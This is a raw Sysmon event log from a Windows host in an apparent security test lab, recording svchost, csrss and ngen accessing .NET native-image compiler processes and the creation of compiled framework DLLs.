13:51:03.429{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9247-6005-3E04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.414{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9247-6005-3E04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:03.414{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9247-6005-3E04-00000000A301}2832C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:03.289{59A5CD1D-9245-6005-3D04-00000000A301}4928C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1340-0\System.IdentityModel.dll2021-01-18 13:51:03.289 10341000x80000000000000008562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.960{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.945{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.945{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4704-00000000A301}4616C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.882{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4604-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.867{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4604-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.867{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4604-00000000A301}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:04.804{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\109c-0\System.IO.Compression.FileSystem.dll2021-01-18 13:51:04.804 10341000x80000000000000008555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.773{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.757{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.757{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4504-00000000A301}4252C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.726{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4404-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.710{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4404-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.710{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4404-00000000A301}3464C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:04.648{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1310-0\System.IO.Compression.dll2021-01-18 13:51:04.648 10341000x80000000000000008548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.554{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.539{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.539{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4304-00000000A301}4880C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9248-6005-4204-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.492{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9248-6005-4204-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:04.492{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9248-6005-4204-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:51:04.414{59A5CD1D-9247-6005-4104-00000000A301}2484C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\9b4-0\System.IdentityModel.Services.dll2021-01-18 13:51:04.414 10341000x80000000000000008572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:51:05.804{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9249-6005-4A04-00000000A301}4480C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 